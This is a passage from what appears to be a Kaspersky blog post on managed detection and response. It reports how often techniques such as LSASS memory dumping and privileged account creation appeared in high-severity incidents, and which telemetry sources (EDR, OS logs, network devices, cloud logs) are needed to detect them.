Though seemingly simple, this event appeared in 12% of high-severity incidents, and requires an up-to-date IP reputation database for detection. In a company’s infrastructure, access attempts can be tracked in multiple ways: EPP detection, network-level monitoring, and DNS/HTTP request analysis. The MDR provider can also use threat intelligence databases to enrich the client’s telemetry.

Memory fragment dumps

To escalate an attack within a victim’s network after the initial compromise, attackers often try to obtain credentials on an infected machine. If they get lucky, these may be network administrator credentials, allowing them to quickly take over servers. A classic technique for achieving this is extracting and saving memory fragments related to the LSASS (Local Security Authority Subsystem Service). In 2024, we detected this technique in nearly 12% of high-severity incidents.

Attempts to capture LSASS memory can be detected in multiple ways: using certain EPP and EDR rules, analyzing command-line parameters when launching applications, scripts and processes, and monitoring access to LSASS.

Executing a low-reputation object

Although a file, script, or document may not be definitively malicious, if it was previously observed in suspicious activity, MDR specialists must check whether a cyberattack is underway. This requires telemetry that logs processes launching suspicious files. And, of course, threat intelligence is needed to flag the file’s bad reputation. Execution of low-reputation objects was observed in 10% of high-severity incidents.

Adding privileged users

Beyond stealing administrator accounts, attackers often create their own accounts and then elevate their privileges. In 9% of high-severity incidents, an account was added to a privileged corporate domain group. To detect this, OS event collection must capture all account modifications.

Remote process execution

In over 5% of incidents, there was a process involved that was launched by a remote user. To monitor such events, computers must log process launch events and the loading of executable file sections into memory.

Malicious address in event parameters

In any event-parameters — but most commonly in the command line of the running process — a known malicious URL may appear. This was observed in nearly 5% of high-severity incidents, making it crucial to always include detailed parameters of logged events, including the full command line, in the telemetry. For MDR providers, such detection is only possible with access to a large URL-reputation database (which we, of course, have).

Telemetry sources

Above, we’ve highlighted the most critical events that help an MDR team detect and prevent serious incidents. The full report covers additional events and a deeper analysis of attacker tactics. The list above makes it clear what types of data must be transmitted to an MDR service in real time for it to work effectively. First and foremost, this includes:

  • Telemetry from endpoint protection solutions (EPP) or EDR agents. In today’s organizations, traditional “antivirus” and detection and response tools are often integrated into a single product. This provides key telemetry from computers and servers, so its presence is essential on all machines, along with the configuration of detailed event logging in collaboration with the MDR team.
  • OS events. Properly configured Windows logs provide critical information about account manipulations, process launches and terminations, and more. On Linux systems, the same role is played by Audit Daemon (aka auditd). Special attention must be given to configuring logging on all of the organization’s servers. Detailed recommendations for settings for Windows can be found in our knowledge base. The Sysmon tool from the Microsoft Sysinternals suite enhances the effectiveness of Windows logs.
  • Events from network devices. It’s critical to configure detailed logging on network devices — primarily firewalls and web filters, but also routers, proxies, and DNS servers if used in the company.
  • Cloud environment logs. Attackers frequently compromise cloud infrastructure and SaaS tools, where the previously mentioned logs are typically not available. Therefore, it’s essential to set up comprehensive security-focused logging using cloud-native tools, such as AWS CloudTrail.

Kaspersky official blog – ​Read More